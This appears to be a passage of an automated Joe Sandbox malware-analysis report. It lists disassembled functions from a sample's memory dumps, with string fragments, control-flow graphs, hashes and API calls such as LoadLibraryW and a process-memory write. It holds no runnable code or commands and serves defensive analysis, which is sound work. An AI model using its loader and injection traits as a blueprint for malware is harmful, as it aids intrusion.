                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID: A$D$L$L$L$L$P$S$W$W$_R$a$a$a$a$b$b$b$c$c$d$d$e$e$e$g$i$i$i$o$o$o$o$p$r$r$r$r$r$s$s$t$t$u$v$y$y
                                                                          • API String ID: 3559483778-1307394542
                                                                          • Opcode ID: 3ea60ddc4aceaf9c214006cf0488501bb34de7a7dbec126d93c1b770d68830df
                                                                          • Instruction ID: 800750eae04ccb2c17ce4e583eb200145dba391c62227ba782aa01ae421b1b55
                                                                          • Opcode Fuzzy Hash: 3ea60ddc4aceaf9c214006cf0488501bb34de7a7dbec126d93c1b770d68830df
                                                                          • Instruction Fuzzy Hash: 5372E1B1D082A88AEB24CB24CC847EABBB5FF55304F0481E9D44DA7685D2799FC5CF52
                                                                          Function 0082ED6C Relevance: 79.8, APIs: 2, Strings: 43, Instructions: 1073COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: :?@>$A79>$J3LP$L$L$L$L$L$L$L3G:$P$P$W$W$W$ZR$a$a$a$a$a$a$b$b$b$d$d$d$i$i$i$o$o$o$r$r$r$r$r$r$y$y$y
                                                                          • API String ID: 0-2166508227
                                                                          • Opcode ID: 777f3830e681067d68e7c78ef7cf82ae6ad36378ee805a4e5de8220d4aee1a67
                                                                          • Instruction ID: 8c3c49218cdd2424539dd849073bfa2613258b2de781deb673f73a5e534b09b8
                                                                          • Opcode Fuzzy Hash: 777f3830e681067d68e7c78ef7cf82ae6ad36378ee805a4e5de8220d4aee1a67
                                                                          • Instruction Fuzzy Hash: 86A21691D086A88AFB218724DC447AA7B75FF91304F0480F9D48CAB282D67E5FD5CF66
                                                                          Function 0082EEAD Relevance: 79.7, APIs: 2, Strings: 43, Instructions: 998COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: :?@>$A79>$J3LP$L$L$L$L$L$L$L3G:$P$P$W$W$W$ZR$a$a$a$a$a$a$b$b$b$d$d$d$i$i$i$o$o$o$r$r$r$r$r$r$y$y$y
                                                                          • API String ID: 0-2166508227
                                                                          • Opcode ID: 0bc74c15971a6514468afca5d746488cf26023405e8c5503983517a713978ad0
                                                                          • Instruction ID: c87e488e20f1befaf9eac49f71384bcc82dc33bb2792faf1c0bd6a02d2553f1b
                                                                          • Opcode Fuzzy Hash: 0bc74c15971a6514468afca5d746488cf26023405e8c5503983517a713978ad0
                                                                          • Instruction Fuzzy Hash: 99921551D086A88AFB218724DC447AABB75FF91304F0480F9D48CAB282D67E5FD5CF66
                                                                          Function 0082EECE Relevance: 79.7, APIs: 2, Strings: 43, Instructions: 988COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: :?@>$A79>$J3LP$L$L$L$L$L$L$L3G:$P$P$W$W$W$ZR$a$a$a$a$a$a$b$b$b$d$d$d$i$i$i$o$o$o$r$r$r$r$r$r$y$y$y
                                                                          • API String ID: 0-2166508227
                                                                          • Opcode ID: c3c4b97afc01b5f44dcaeb9454b987c1b8d0f1e6130360dcf60612f2bc77521a
                                                                          • Instruction ID: 15b2a5f85f5eb8caf764c5d6c9c817180853612d1359fb067a37a5432d40772f
                                                                          • Opcode Fuzzy Hash: c3c4b97afc01b5f44dcaeb9454b987c1b8d0f1e6130360dcf60612f2bc77521a
                                                                          • Instruction Fuzzy Hash: A5920451D086A88AFB218724DC547AABB75FF91304F0480F9D48CAB282D67E5FD5CF62
                                                                          Function 0082F4C8 Relevance: 77.8, APIs: 2, Strings: 42, Instructions: 844COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 715 82f4c8-82f4d8 716 82f4de-82f4eb 715->716 717 82f3dd-82f467 715->717 719 82f4f9 716->719 720 82f4ed-82f4f7 716->720 721 82f472-82f4b3 717->721 722 82f46d call 82f47c 717->722 723 82f503-82f509 719->723 720->723 725 82f50f-8305fd call 82f5e8 call 82f75d LoadLibraryW 721->725 722->721 723->725 743 83065a-8319ae call 830688 call 830700 call 8309fe call 830acc call 830ebd 725->743 744 8305ff-83061a LoadLibraryW 725->744 755 8319b6-833060 call 831a1b call 831a32 call 831aa8 call 831c3c call 831c86 call 83210a call 83211f call 83305e 743->755 744->743 745 83061c-830637 744->745 745->743 751 830639-830654 745->751 751->743 751->755 807 833062 755->807 807->807
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: :?@>$J3LP$L$L$L$L$L$L$L3G:$P$P$W$W$W$ZR$a$a$a$a$a$a$b$b$b$d$d$d$i$i$i$o$o$o$r$r$r$r$r$r$y$y$y
                                                                          • API String ID: 0-4213390939
                                                                          • Opcode ID: 084ab36494b0247b970bdaa78185fe49918d179e61d5af7e688872fa0db9c617
                                                                          • Instruction ID: aa0efff2639510892d2bdceaae045c5a67c019e3fcb19369b52271f88505acb0
                                                                          • Opcode Fuzzy Hash: 084ab36494b0247b970bdaa78185fe49918d179e61d5af7e688872fa0db9c617
                                                                          • Instruction Fuzzy Hash: DE72E4A1D046A88EFB218B24DC547AA7B79EF91304F0480F9D48CA7281D67E5FD5CF62
                                                                          Function 0082F3FC Relevance: 77.8, APIs: 2, Strings: 42, Instructions: 823COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: :?@>$J3LP$L$L$L$L$L$L$L3G:$P$P$W$W$W$ZR$a$a$a$a$a$a$b$b$b$d$d$d$i$i$i$o$o$o$r$r$r$r$r$r$y$y$y
                                                                          • API String ID: 0-4213390939
                                                                          • Opcode ID: 30a7e5b34ec73870998d2a8438680104056d2f87f0fd16e424783eaa05757f17
                                                                          • Instruction ID: cb38cb41ccfa9148f1df71559460aafd618c8090e3b1c159f4ab198ad5cb03b1
                                                                          • Opcode Fuzzy Hash: 30a7e5b34ec73870998d2a8438680104056d2f87f0fd16e424783eaa05757f17
                                                                          • Instruction Fuzzy Hash: 7B72E4A1D046A88EFB218724DC547AA7B79EF91304F0480F9D48CA7282D67E5FD5CF62
                                                                          Function 0082F566 Relevance: 77.8, APIs: 2, Strings: 42, Instructions: 779COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: :?@>$J3LP$L$L$L$L$L$L$L3G:$P$P$W$W$W$ZR$a$a$a$a$a$a$b$b$b$d$d$d$i$i$i$o$o$o$r$r$r$r$r$r$y$y$y
                                                                          • API String ID: 0-4213390939
                                                                          • Opcode ID: 4a925cbadef9c540b0136d5568bc7a529c7737005d0787ada711e4b0c261c8ee
                                                                          • Instruction ID: 21ae68077b04628e3768d9676ca05f7cacc93364794154bcf43bd6db8d8c45f6
                                                                          • Opcode Fuzzy Hash: 4a925cbadef9c540b0136d5568bc7a529c7737005d0787ada711e4b0c261c8ee
                                                                          • Instruction Fuzzy Hash: F262D4A1D046A88EFB218724DC547AA7B79EF91304F0480F9D48CA7282D67E5FD5CF62
                                                                          Function 0082F333 Relevance: 77.8, APIs: 2, Strings: 42, Instructions: 773COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: :?@>$J3LP$L$L$L$L$L$L$L3G:$P$P$W$W$W$ZR$a$a$a$a$a$a$b$b$b$d$d$d$i$i$i$o$o$o$r$r$r$r$r$r$y$y$y
                                                                          • API String ID: 0-4213390939
                                                                          • Opcode ID: 50155792656fd08c0c04579a9832743213fc242382d4ff6cdf5d66f663d059e4
                                                                          • Instruction ID: b6c6dd8adabd99537e09e99cd6882e191ba4e03df5fcfd8038e65c9d226fcebc
                                                                          • Opcode Fuzzy Hash: 50155792656fd08c0c04579a9832743213fc242382d4ff6cdf5d66f663d059e4
                                                                          • Instruction Fuzzy Hash: B462F5A1D086A88EF7218724DC547AA7B79EF91304F0480F9D48CA7282D67E5FD5CF62
                                                                          Function 0082F6C3 Relevance: 77.7, APIs: 2, Strings: 42, Instructions: 701libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: :?@>$J3LP$L$L$L$L$L$L$L3G:$P$P$W$W$W$ZR$a$a$a$a$a$a$b$b$b$d$d$d$i$i$i$o$o$o$r$r$r$r$r$r$y$y$y
                                                                          • API String ID: 1029625771-4213390939
                                                                          • Opcode ID: 6bcf25f7376dcfef4b1cee5d05798b4a67e2137c0f87b421cf068cf447802002
                                                                          • Instruction ID: 4027657ed0c1b0da2c083dcf75c318ad7aae436f76a5d93650f8ba7c3f2fe42c
                                                                          • Opcode Fuzzy Hash: 6bcf25f7376dcfef4b1cee5d05798b4a67e2137c0f87b421cf068cf447802002
                                                                          • Instruction Fuzzy Hash: D052E5A1D086A88EF7218724DC547AA7BB9EF91304F0480F9D44CA7282D67E5FD5CF62
                                                                          Function 0082F90E Relevance: 54.9, APIs: 2, Strings: 29, Instructions: 683libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1136 82f90e-8305fd LoadLibraryW 1147 83065a-8319ae call 830688 call 830700 call 8309fe call 830acc call 830ebd 1136->1147 1148 8305ff-83061a LoadLibraryW 1136->1148 1159 8319b6-833060 call 831a1b call 831a32 call 831aa8 call 831c3c call 831c86 call 83210a call 83211f call 83305e 1147->1159 1148->1147 1149 83061c-830637 1148->1149 1149->1147 1155 830639-830654 1149->1155 1155->1147 1155->1159 1211 833062 1159->1211 1211->1211
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: :PJ7$J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2644095800
                                                                          • Opcode ID: 8c380361ba80d1a1ed398a8d1df233f8191ccec12e04f719b0b3eda72e79ef91
                                                                          • Instruction ID: a0610c1fd34f193b46a86cb1a94b1c4c34390519117f474627b2752cbc37561f
                                                                          • Opcode Fuzzy Hash: 8c380361ba80d1a1ed398a8d1df233f8191ccec12e04f719b0b3eda72e79ef91
                                                                          • Instruction Fuzzy Hash: EC4205A1D086A89EFB218624DC547EA7B79EF91304F0480F9D44CA7282D67E5FC58F62
                                                                          Function 0082F9E3 Relevance: 53.3, APIs: 2, Strings: 28, Instructions: 778libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1212 82f9e3-82fa22 1213 82fa34 1212->1213 1214 82fa24-82fa2e 1212->1214 1216 82fa3e-8305fd LoadLibraryW 1213->1216 1214->1213 1215 82f7ff-82f9d4 call 82f81f call 82f8f6 call 82f909 1214->1215 1215->1216 1227 83065a-8319ae call 830688 call 830700 call 8309fe call 830acc call 830ebd 1216->1227 1228 8305ff-83061a LoadLibraryW 1216->1228 1246 8319b6-833060 call 831a1b call 831a32 call 831aa8 call 831c3c call 831c86 call 83210a call 83211f call 83305e 1227->1246 1228->1227 1230 83061c-830637 1228->1230 1230->1227 1239 830639-830654 1230->1239 1239->1227 1239->1246 1300 833062 1246->1300 1300->1300
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: 0176a12da76e4eea0a0e60bf73e0ac39b9a7a9aa90e816a95e5e549cb7a39214
                                                                          • Instruction ID: 9c0eef0ce7d7605d9cdd1347d78c788d5eff9da88c799751140258a8fa483f19
                                                                          • Opcode Fuzzy Hash: 0176a12da76e4eea0a0e60bf73e0ac39b9a7a9aa90e816a95e5e549cb7a39214
                                                                          • Instruction Fuzzy Hash: 356203A1D046A88FFB218B24DC547EA7B79EF91304F0480F9D44CA7282D67A5FC58F62
                                                                          Function 0082F816 Relevance: 53.3, APIs: 2, Strings: 28, Instructions: 751COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: 5b89dfe9d3ec38d19b7166ee9fb7f25dec648d41a7c14bddf6d9c4d46abfd2a5
                                                                          • Instruction ID: adc937c162f5e6fffa87378c70f30b95f075700b61a50ae1a4bb1e09ef7f7bcb
                                                                          • Opcode Fuzzy Hash: 5b89dfe9d3ec38d19b7166ee9fb7f25dec648d41a7c14bddf6d9c4d46abfd2a5
                                                                          • Instruction Fuzzy Hash: C15203A1D046A88EFB218B24DC547EA7B79EF91304F0480F9D44DA7282D67E5FC58F62
                                                                          Function 0082F946 Relevance: 53.2, APIs: 2, Strings: 28, Instructions: 743COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1385 82f946-82f956 1386 82f85b-82f931 call 82f8f6 call 82f909 1385->1386 1387 82f95c-82f969 1385->1387 1393 82f98d-8305fd LoadLibraryW 1386->1393 1388 82f977 1387->1388 1389 82f96b-82f975 1387->1389 1391 82f981-82f987 1388->1391 1389->1391 1391->1393 1407 83065a-8319ae call 830688 call 830700 call 8309fe call 830acc call 830ebd 1393->1407 1408 8305ff-83061a LoadLibraryW 1393->1408 1419 8319b6-833060 call 831a1b call 831a32 call 831aa8 call 831c3c call 831c86 call 83210a call 83211f call 83305e 1407->1419 1408->1407 1409 83061c-830637 1408->1409 1409->1407 1415 830639-830654 1409->1415 1415->1407 1415->1419 1471 833062 1419->1471 1471->1471
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 0-2610222823
                                                                          • Opcode ID: 75c333e59389ae19ed56347aae69c2ebd2daafe5f6c13f84d3034dfe16d75862
                                                                          • Instruction ID: f4a56a4d52d39ef7b328e1d7d5c905162a9ea84e7d6dc30908952801726cc6ad
                                                                          • Opcode Fuzzy Hash: 75c333e59389ae19ed56347aae69c2ebd2daafe5f6c13f84d3034dfe16d75862
                                                                          • Instruction Fuzzy Hash: 9452F3A1D046A88EFB218B24DC547EA7B79EF91304F0480F9D44DA7282D67E5FC58F62
                                                                          Function 0082FAC8 Relevance: 53.2, APIs: 2, Strings: 28, Instructions: 699libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: 8227b72ff8227e4a86aa0844e00e752c506396859a83a6a127eef147f54919c1
                                                                          • Instruction ID: 776e2090317550b12ebae09b412be5773f9bbebe9e5201dc0532d4d83d1f7e1c
                                                                          • Opcode Fuzzy Hash: 8227b72ff8227e4a86aa0844e00e752c506396859a83a6a127eef147f54919c1
                                                                          • Instruction Fuzzy Hash: 4352F4A1D046A88EFB218724DC587EA7B79EF91304F0480F9D44CA7282D67E5FD58F62
                                                                          Function 0082FDF5 Relevance: 53.2, APIs: 2, Strings: 28, Instructions: 683libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: 08f73ee666e21a0eba55056523f2a5d62308f971d9a2e67c6a949d0252063e2e
                                                                          • Instruction ID: 38d5b5750e5eace9f2be650fc046ea424ae45e0d5bfea42af4419aff69c0eb3f
                                                                          • Opcode Fuzzy Hash: 08f73ee666e21a0eba55056523f2a5d62308f971d9a2e67c6a949d0252063e2e
                                                                          • Instruction Fuzzy Hash: D252F5A1D046A88EFB218724DC547EA7B79EF91304F0480F9D44CA7282D67E5FD58F62
                                                                          Function 0082FB99 Relevance: 53.2, APIs: 2, Strings: 28, Instructions: 681libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: 98f5de083789d617b5fbb1a78ca671abbe3211560ce0cdde577f0cd05afe31ee
                                                                          • Instruction ID: ca260aa6ea7cc2dffd0f466445cae8bad5a18f606276b31af4c08ef7eea72d7a
                                                                          • Opcode Fuzzy Hash: 98f5de083789d617b5fbb1a78ca671abbe3211560ce0cdde577f0cd05afe31ee
                                                                          • Instruction Fuzzy Hash: 4F42F5A1D046A88EFB218724DC587EA7B79EF91304F0480F9D44CA7282D67E5FD58F62
                                                                          Function 0082FB42 Relevance: 53.2, APIs: 2, Strings: 28, Instructions: 681libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: c681d19b26f91a482e53d726449cf044933ed3160262f7dccefa6fe4d5b6c5af
                                                                          • Instruction ID: 49bf248acc41f4d89d32d421b4e31a1adc5e4cc9c56ee6b11d97edc6d18edd71
                                                                          • Opcode Fuzzy Hash: c681d19b26f91a482e53d726449cf044933ed3160262f7dccefa6fe4d5b6c5af
                                                                          • Instruction Fuzzy Hash: A342F5A1D046A88EFB218724DC587EA7B79EF91304F0480F9D44CA7282D67E5FD58F62
                                                                          Function 0082FB74 Relevance: 53.2, APIs: 2, Strings: 28, Instructions: 681libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: 27e0c1f7354a7e0b19aa8a67b0c25058b8c82f02bb710c471e009f4fa9edf79e
                                                                          • Instruction ID: 24812eb9671029aa4a30a91e5c1dd776295526d9d577a2414225aebe26937dd4
                                                                          • Opcode Fuzzy Hash: 27e0c1f7354a7e0b19aa8a67b0c25058b8c82f02bb710c471e009f4fa9edf79e
                                                                          • Instruction Fuzzy Hash: D942F5A1D046A88EFB218724DC547EA7B79EF91304F0480F9D44CA7282D67E5FD58F62
                                                                          Function 0082FE76 Relevance: 53.2, APIs: 2, Strings: 28, Instructions: 655libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: ed408d1d0b0f23f2d77129ecbd82e2af7012a3d939df1cb929a91f486d172283
                                                                          • Instruction ID: fdb1e9dbcc8691c5aa63ddcb0f0b38b0c16cf6f78fd4f511db1907961e8252d4
                                                                          • Opcode Fuzzy Hash: ed408d1d0b0f23f2d77129ecbd82e2af7012a3d939df1cb929a91f486d172283
                                                                          • Instruction Fuzzy Hash: B342E5A1D046A88EFB218724DC547EA7B79EF91304F0480F9D44CA7282DA7E5FD58F62
                                                                          Function 0082F7E4 Relevance: 53.2, APIs: 2, Strings: 28, Instructions: 652libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: 78f5124a3cdfe6714a43cc9ebd430ccfee4eb0b8e8da373711bc6244a92849aa
                                                                          • Instruction ID: 3bf83771312c42f5846319e231bd6858c75cf57e342640a4bd97c0cd4e3b498c
                                                                          • Opcode Fuzzy Hash: 78f5124a3cdfe6714a43cc9ebd430ccfee4eb0b8e8da373711bc6244a92849aa
                                                                          • Instruction Fuzzy Hash: 9642F4A1D086A88FFB218724DC547AA7B79EF91304F0480F9D44CA7282D67E5FD58F62
                                                                          Function 0082FF1D Relevance: 53.1, APIs: 2, Strings: 28, Instructions: 645libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: f053897cc00dc23acf1833c6ee7bedaf0517b80750cbcdc13bc3f757622fb72c
                                                                          • Instruction ID: bd7e8994484039f3fab84bf0efb28d222e465164f584be4a5d5ed02ed682f545
